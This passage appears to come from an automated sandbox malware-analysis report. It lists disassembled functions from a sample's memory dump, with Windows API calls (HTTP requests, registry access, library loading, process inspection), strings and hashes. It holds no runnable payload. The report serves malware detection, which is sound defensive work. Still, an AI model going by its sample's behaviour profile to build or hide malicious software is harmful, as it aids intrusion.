                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                  • String ID: 0
                                                  • API String ID: 4152858687-4108050209
                                                  • Opcode ID: 7e4d810392dabeb502cbc8deee0a61d7d43ab3adb1a6a9f72f996fb07ada959c
                                                  • Instruction ID: 49b2b02ef0167d4ed88e49b60b249418ccefda80c55273b632e96c091ede92b8
                                                  • Opcode Fuzzy Hash: 7e4d810392dabeb502cbc8deee0a61d7d43ab3adb1a6a9f72f996fb07ada959c
                                                  • Instruction Fuzzy Hash: 8251E1792083009BE7249F28C84566F77E8EF56351F040A2DFCA5D3192DB70EE88D75A
                                                  Function 00C4D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 00C4D5D4
                                                  • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00C4D60A
                                                  • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00C4D61B
                                                  • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00C4D69D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$AddressCreateInstanceProc
                                                  • String ID: DllGetClassObject
                                                  • API String ID: 753597075-1075368562
                                                  • Opcode ID: 3c0f0aa547577f9d51a5e82097213b2e4bb65f86e137fc89776b9304b92eef13
                                                  • Instruction ID: a43723e947dee28afc1d7bd0cf5cc7d37009b0610c7300f1585926ec9c82411e
                                                  • Opcode Fuzzy Hash: 3c0f0aa547577f9d51a5e82097213b2e4bb65f86e137fc89776b9304b92eef13
                                                  • Instruction Fuzzy Hash: 9F4160B1600204EFDB15EF54C888B9A7BB9FF45314F1685ADBD0A9F205D7B1DA84CBA0
                                                  Function 00C52753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C527C0
                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C527DC
                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00C52822
                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CB5890,00000000), ref: 00C5286B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$Delete$InfoItem_memset
                                                  • String ID: 0
                                                  • API String ID: 1173514356-4108050209
                                                  • Opcode ID: 2bc43bf1600f7dbb424585a9957db5b034e6c303cd41bcd358c67b21fd468714
                                                  • Instruction ID: 795a14184f2b02bf30ccbee3afc6e2374689f8ae625ff0b6d42ddcad7262d61f
                                                  • Opcode Fuzzy Hash: 2bc43bf1600f7dbb424585a9957db5b034e6c303cd41bcd358c67b21fd468714
                                                  • Instruction Fuzzy Hash: B641F279204301AFD720DF64C884F2ABBE8EF86315F04496DF865972D2C730E949CB56
                                                  Function 00C6D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 00C6D7C5
                                                    • Part of subcall function 00BF784B: _memmove.LIBCMT ref: 00BF7899
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharLower_memmove
                                                  • String ID: cdecl$none$stdcall$winapi
                                                  • API String ID: 3425801089-567219261
                                                  • Opcode ID: 36332d18f8ccbb1a1f74c797b1804a87edd960705a804b25303a8afae00e13d2
                                                  • Instruction ID: 0b2e6dd2e47c4f4a05cd0133e4a5ae3561a5ac0260f97f4755eb1ed9578984ce
                                                  • Opcode Fuzzy Hash: 36332d18f8ccbb1a1f74c797b1804a87edd960705a804b25303a8afae00e13d2
                                                  • Instruction Fuzzy Hash: 7B31B070A04609ABCF10EF58CC959FEB3F4FF09320B108669E826976D1DB71A905CB80
                                                  Function 00C48E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C48F14
                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C48F27
                                                  • SendMessageW.USER32(?,00000189,?,00000000), ref: 00C48F57
                                                    • Part of subcall function 00BF7BCC: _memmove.LIBCMT ref: 00BF7C06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$_memmove$ClassName
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 365058703-1403004172
                                                  • Opcode ID: 4e01fba5bc6a807db63a951bc28b87a09419da6e8866c8c8bbb584676527f61d
                                                  • Instruction ID: 68afa82ed54b044a39ae86a76fe67ab134d58ad3a72fbaf72d8ff5edbd77f6b7
                                                  • Opcode Fuzzy Hash: 4e01fba5bc6a807db63a951bc28b87a09419da6e8866c8c8bbb584676527f61d
                                                  • Instruction Fuzzy Hash: 07212671A40108BEEB14ABB4DC89DFFB7B9EF06320B104569F525A71E1DF39494EE620
                                                  Function 00C6182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00C6184C
                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C61872
                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00C618A2
                                                  • InternetCloseHandle.WININET(00000000), ref: 00C618E9
                                                    • Part of subcall function 00C62483: GetLastError.KERNEL32(?,?,00C61817,00000000,00000000,00000001), ref: 00C62498
                                                    • Part of subcall function 00C62483: SetEvent.KERNEL32(?,?,00C61817,00000000,00000000,00000001), ref: 00C624AD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                  • String ID:
                                                  • API String ID: 3113390036-3916222277
                                                  • Opcode ID: a201b604811e742bd65f75876f8e5110ed91ce0aea22b9f47a1873d13d9c3f3e
                                                  • Instruction ID: 8bb5437a4882d174a41e952f0252767bbe0937efe6292109aefaec5183df9b27
                                                  • Opcode Fuzzy Hash: a201b604811e742bd65f75876f8e5110ed91ce0aea22b9f47a1873d13d9c3f3e
                                                  • Instruction Fuzzy Hash: 5921B0B1500208BFEB219B65DCC5FBF77EDEB48746F18412AF80597180DA248E0567A1
                                                  Function 00C763E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00BF1D73
                                                    • Part of subcall function 00BF1D35: GetStockObject.GDI32(00000011), ref: 00BF1D87
                                                    • Part of subcall function 00BF1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00BF1D91
                                                  • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C76461
                                                  • LoadLibraryW.KERNEL32(?), ref: 00C76468
                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C7647D
                                                  • DestroyWindow.USER32(?), ref: 00C76485
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                  • String ID: SysAnimate32
                                                  • API String ID: 4146253029-1011021900
                                                  • Opcode ID: 39a142be4a161797d4393684b258903569fc0e45f412d1a99221e1a42a86502e
                                                  • Instruction ID: f5f85bad22b05af914d7c82d3d4b42cf45be104643229adfeee58d4787b4d7e1
                                                  • Opcode Fuzzy Hash: 39a142be4a161797d4393684b258903569fc0e45f412d1a99221e1a42a86502e
                                                  • Instruction Fuzzy Hash: 4C218E71200A05AFEF108F65DC80FBA37A9EB59364F108629FA28921A0D771DC91A760
                                                  Function 00C56D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C56DBC
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C56DEF
                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C56E01
                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C56E3B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 2586a25b65cc874c95fb4ecc587b21577292b2b0f8f02b190372e200f42f38ba
                                                  • Instruction ID: 4b0fba00c68f6193aaf6282f3934fbd710057fdcedae75dee7c753ffc63896cc
                                                  • Opcode Fuzzy Hash: 2586a25b65cc874c95fb4ecc587b21577292b2b0f8f02b190372e200f42f38ba
                                                  • Instruction Fuzzy Hash: BF21B278600209ABDB209F29DC45B9E77F4EF54722F604A29FCB0D72D0D7709999CB58
                                                  Function 00C56E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C56E89
                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C56EBB
                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C56ECC
                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C56F06
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: CreateHandle$FilePipe
                                                  • String ID: nul
                                                  • API String ID: 4209266947-2873401336
                                                  • Opcode ID: 52e1210ebc270c14e4edbf03493259f6b892d31d1f042948ec96eb28e6a2aaba
                                                  • Instruction ID: fc9613f1042c222af1ab69791cb9ebd1800bc37b7951a58137192c9ffda85cc8
                                                  • Opcode Fuzzy Hash: 52e1210ebc270c14e4edbf03493259f6b892d31d1f042948ec96eb28e6a2aaba
                                                  • Instruction Fuzzy Hash: F821C47D5013059BDB209F69CC45BAA77A8EF45721F600A19FCB1D32D0D7B0A9D9C718
                                                  Function 00C5AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C5AC54
                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C5ACA8
                                                  • __swprintf.LIBCMT ref: 00C5ACC1
                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C7F910), ref: 00C5ACFF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                  • String ID: %lu
                                                  • API String ID: 3164766367-685833217
                                                  • Opcode ID: 0500aba16983b329f061314e86f62084f35e243df621315948dd85736a7df6d3
                                                  • Instruction ID: c0af78ef8ac0a0734753b187a92caf64d20b51467fc92a0724a0c66b6bb390fc
                                                  • Opcode Fuzzy Hash: 0500aba16983b329f061314e86f62084f35e243df621315948dd85736a7df6d3
                                                  • Instruction Fuzzy Hash: 8A217F35A00109AFCB10EF65DD85EAE7BB8FF49314B0040A9F909EB252DA71EA45DB21
                                                  Function 00C51AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?), ref: 00C51B19
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                  • API String ID: 3964851224-769500911
                                                  • Opcode ID: ba7b0e638fe7fedcee3dfca6352b100a7b68f3532ba5d328095a93b8160757ed
                                                  • Instruction ID: 035d2a5edac92fb0735c6c2926d42b95e9ac8df78072f345be2f73e4d1551e42
                                                  • Opcode Fuzzy Hash: ba7b0e638fe7fedcee3dfca6352b100a7b68f3532ba5d328095a93b8160757ed
                                                  • Instruction Fuzzy Hash: 351161B4D001098FCF00EFA4D8559FEB7B4FF26308B2484A9DC2467291EB325D8AEB54
                                                  Function 00C6EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C6EC07
                                                  • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C6EC37
                                                  • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00C6ED6A
                                                  • CloseHandle.KERNEL32(?), ref: 00C6EDEB
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                  • String ID:
                                                  • API String ID: 2364364464-0
                                                  • Opcode ID: 90b0e2dab645e5dd898c1846661354bf61582efb98ae0d3cedbc907e6509ca15
                                                  • Instruction ID: c40e69622a7d43c5d24d4207da71933ef556ae58a0f2361fbfce1fe8cd481e33
                                                  • Opcode Fuzzy Hash: 90b0e2dab645e5dd898c1846661354bf61582efb98ae0d3cedbc907e6509ca15
                                                  • Instruction Fuzzy Hash: F58194756043009FDB20EF29C886F2AB7E5AF44750F04885DFAA9DB2D2DB70AD45CB51
                                                  Function 00C70037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C70E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C6FDAD,?,?), ref: 00C70E31
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C700FD
                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C7013C
                                                  • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C70183
                                                  • RegCloseKey.ADVAPI32(?,?), ref: 00C701AF
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00C701BC
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                  • String ID:
                                                  • API String ID: 3440857362-0
                                                  • Opcode ID: 01472c44425f6bbfaf8c47d9b6e3ad08b95d41737ef1079f6c3e8d8269c2052a
                                                  • Instruction ID: f5ef6450d94a21977ccb03a512a0557a2d35d39dd95a45f0f42cf4dc7da31efc
                                                  • Opcode Fuzzy Hash: 01472c44425f6bbfaf8c47d9b6e3ad08b95d41737ef1079f6c3e8d8269c2052a
                                                  • Instruction Fuzzy Hash: 38513871208204AFD714EF68CC81F6EB7E9BF84314F50896DF599872A2DB31E949CB52
                                                  Function 00C6D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C6D927
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C6D9AA
                                                  • GetProcAddress.KERNEL32(00000000,00000000), ref: 00C6D9C6
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00C6DA07
                                                  • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00C6DA21
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00C57896,?,?,00000000), ref: 00BF5A2C
                                                    • Part of subcall function 00BF5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00C57896,?,?,00000000,?,?), ref: 00BF5A50
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 327935632-0
                                                  • Opcode ID: 40620120245c3afabcdd85ea45f7f2736cb3d3f09bcc2a53e5601a1b94bf5254
                                                  • Instruction ID: dbe416165a8a3a2bcde69ee140cd216b8e9d07708cb58b255b1bfd32f3885608
                                                  • Opcode Fuzzy Hash: 40620120245c3afabcdd85ea45f7f2736cb3d3f09bcc2a53e5601a1b94bf5254
                                                  • Instruction Fuzzy Hash: 53512B35A04609DFCB10EFA8C484AADB7F4FF09314B158099EA56AB312DB31AD45CF51
                                                  Function 00C5E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C5E61F
                                                  • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00C5E648
                                                  • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C5E687
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C5E6AC
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C5E6B4
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                  • String ID:
                                                  • API String ID: 1389676194-0
                                                  • Opcode ID: 5a6f98391eca9ceaf72c29b62a218abf85a86e7be4ec21cc68d50396907a7741
